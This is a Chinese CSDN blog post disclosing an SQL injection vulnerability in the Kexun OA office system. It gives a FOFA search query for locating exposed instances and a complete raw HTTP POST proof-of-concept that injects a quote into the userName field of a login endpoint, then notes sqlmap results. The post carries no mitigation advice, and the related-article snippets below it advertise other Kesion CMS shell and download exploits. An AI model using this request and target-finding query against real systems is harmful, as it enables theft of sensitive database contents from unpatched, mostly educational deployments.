科迅OA办公系统存在SQL注入漏洞

已于 2024-08-14 14:47:12 修改
阅读量193 收藏
点赞数 2
文章标签: sql 数据库
于 2024-08-14 12:55:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77012231/article/details/141188120
版权

漏洞描述
 安徽科迅教育装备20年来来始终坚持智慧校园集成方案产品的开发和部署应用,我们有完善的智慧校园和数字校园建设方案,根据不同的学校不同的实际情况量身定做系统集成方案。产品主要是为了实现校园的智慧网络、智慧OA、智慧教学、智慧学习、数字医疗、智慧安防、智慧平台、校园一卡通智慧结算等。科迅OA办公系统存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。

FOFA:

body="科迅OA办公系统 - 用户登陆"

漏洞复现

 POC:

POST /Iservice.ashx?op=LoginFSYZM HTTP/1.1
Host: 
Content-Length: 30
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://127.0.0.1
Referer: http://127.0.0.1/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: CheckCode=3345
Connection: keep-alive

userName=admin'&userPwd=111111

sqlmap结果

 

马船长
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
科讯kesioncms 5.5以下漏洞拿shell方法的原理总结
09-28
科讯做为一个强大的cms程序大多被政府和教育机构网站所使用,关于科讯的漏洞利用教程网上不是很多。
科讯 kesionCMS >=8.0 9.0 任意下载漏洞 Exp
收集盒 Book box
01-20 2580
1.kesionCMS 版本 大于等于8.0 2.存在用户管理平台     这次主要更几点: 1.对8.x 9.x 都做了自行判断 2.发布投稿后会程序自动删除发布的投稿 3.增加数据库下载方式  set xiaku 1 设置即可! 4.代码整理!! 基本上就可以利用了。下面付上exploit for wve php class kesion8x_9x { public fu
Kesion cms 路径泄露漏洞
收集盒 Book box
09-09 2748
暴路径bug 1 : http://www.xx .com/user/editor.asp?ChannelID=10000&ID=Content ---------------------------------------------------------------------------------------------- 暴路径bug 2 : 最近看到一个科汛的cm
KesionIEXAM科迅在线考试系统 v5.0
12-30
KESIONIEXAM V5.0在线考试系统ASP.NET 5.0技术架构设计,采用MVC全架构,支持“pc版+手机版+微信端+原生app”多终端,一站式数据库管理,后台统一添加内容,能够满足用户大规模的在线考
KesionIMALL科迅在线商城系统 v5.0
12-30
KESIONIMALL在线商城系统经过KESION电商全体研发人员的不懈努力下,KESION(.NET版系列)之KesionIMALL电商产品终于上线啦!!相对之前的版本,此次版5.0全MVC架构,清靓丽的多模板风
KesionICMS科迅智能建站系统(通用版) v5.0
12-30
经过KESION全体研发人员的不懈努力下,KESION(.NET版系列)之KeisonICMS智能建站系统版v5.0终于登场啦!!相对之前的版本,此次版5.0全mvc架构,清靓丽的多模板风格,定让您目
科迅在线考试系统建设设计方案.doc
10-08
**科迅在线考试系统建设设计方案** 前言: 科迅在线考试系统旨在提供一个高效、便捷、安全的在线考试平台,适应信息化教育的发展趋势,满足各类教育机构、企事业单位及个人进行远程考试、评估与学习的需求。该系统...
科迅超市管理系统免费版
09-01
"科迅超市管理系统免费版"是一款专为超市设计的高效管理工具,旨在帮助小型到中型的超市经营者提升日常运营效率。这款系统以其用户友好、功能全面和零成本的优势受到用户的广泛好评。作为一款免费版的软件,它不收取...
Hive SQL
最新发布
08-26 696
tinyint 1byte 有符号整数smallint 2byte 有符号整数int 4byte 有符号整数bigint 8byte 有符号整数boolean 布尔类型,true或者falsefloat 单精度浮点数double 双精度浮点数decimal 十进制精准数字类型 decimal(16,2)
SQL进阶技巧:如何按任意时段分析时间区间问题? | 分区间讨论【左、中、右】
石榴姐yyds
08-23 87
本文分析了一种按任意时段计算时间区间问题的方法和思路,其本质是区间重叠问题的应用,文中给出了两种方法,一种按照区间重叠的方式进行分情况讨论划分区间,找出重叠区间,并计算问题,一种按照区间展开的形式形成全量的明细表,基于明细表求解任意给定的时段统计问题
PostgreSQL如何设置主键自增(序列、SERIAL)
西京刀客
08-26 602
在使用Mysql时,创建表结构时可以通过关键字auto_increment来指定主键是否自增。但在Postgresql数据库中,虽然可以实现字段的自增,但从本质上来说却并不支持Mysql那样的自增。
推荐一篇 学习SQL 的文章
m0_66975650的博客
08-26 277
学习 java,当然避不开数据库的知识,个人认为好学好理解的一篇文章,推荐给大家
SQL基础】【leetcode】SQL50题
FQY__的博客
08-26 752
里的,就可以得到只光顾商店的客人。进行分组,这是因为如果不这样使用,聚合函数返回的结果是一个值,需要用分组进行分开。可以把原始的表分为start表和end表,再进行联表查询,这样就可以计算时间戳的插值,进而使用。)的情况查询出的内容是笛卡儿积,而WHERE的限制条件则是对其的筛选。或者我写的这种隐式链接。是一个用于计算两个日期之间差异的函数,它返回两个日期之间的差异,以天数为单位。这一题的本质就是将两个表合并,得到所需的信息,因此不需要额外的操作了。注意,联表查询得到的结果是一张临时表,而最基础的。
SQL 对版本进行排序遇到的问题
qq_40603125的博客
08-26 96
物料存在多喝版本,我们每次只需要使用最的版本。
[mysql][sql]mysql查询表大小
一名不太专业的程序员
08-21 501
表中选择特定数据库(在这个例子中是名为 'crawleroocllisten' 的数据库)的表信息。查询结果包括数据库名、表名、表中的记录数以及数据和索引所占用的空间容量(单位为MB)。这个查询通常用于数据库管理,帮助管理员了解数据库中各个表的大小和记录数,以便进行优化和维护。函数来将数据和索引长度除以1024两次(将字节转换为MB),并且保留两位小数。SQL 查询语句,用于从。
一条执行24s的SQL产生7小时主备延时(案例详解)
DBdoctor_off的博客
08-26 826
这是MySQL最早的复制格式,所有的操作都会以SQL语句的形式记录在binlog中。主从同步的本质是基于主库的binlog来实现的,主库记录binlog,然后从库将binlog在自己的服务器上重放,从而保证了主、从的数据一致性。使用MySQL的binlog工具查看,主库上执行的这条删除语句,一共删除了10行数据,在binlog中每行数据分别对应一条日志。现在使用最广的是ROW格式,并且一些数据同步工具也要求必须将binlog的格式设置为ROW格式,我们这也是使用的ROW格式。DBdoctor产品介绍。
数据库表的nb3和sql后缀的处理方式
Tresson_A的博客
08-26 188
你想把这个表加到哪个库下就选择 右键备份 -- 还原备份从 -- 选择后缀是nb3的文件。右键你选择存放的数据库 -- 运行sql文件 -- 选择后缀是sql的文件。后缀是sql的话就直接运行sql文件 就可以把数据库添加到本地了(像这样)如果同事给你了一个后缀是nb3的话 那么就需要你去还原了。这样就可以把那个nb3的表还原啦。
MSSQL 工具注入(第一关)
baishiqi12的博客
08-25 601
MSSQL 注入,仅供参考
sql-labs31-34关通关攻略
m0_75036923的博客
08-26 674
1“”
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值